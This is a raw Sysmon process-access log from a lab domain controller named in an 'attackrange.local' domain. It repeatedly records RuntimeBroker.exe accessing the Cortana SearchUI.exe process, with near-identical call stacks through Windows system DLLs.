13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012200Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012199Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012198Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012197Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012196Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012195Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.342{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012194Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012193Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012192Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012191Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012190Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012189Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012188Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012187Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012186Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012185Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012184Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012183Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:12.326{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012182Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 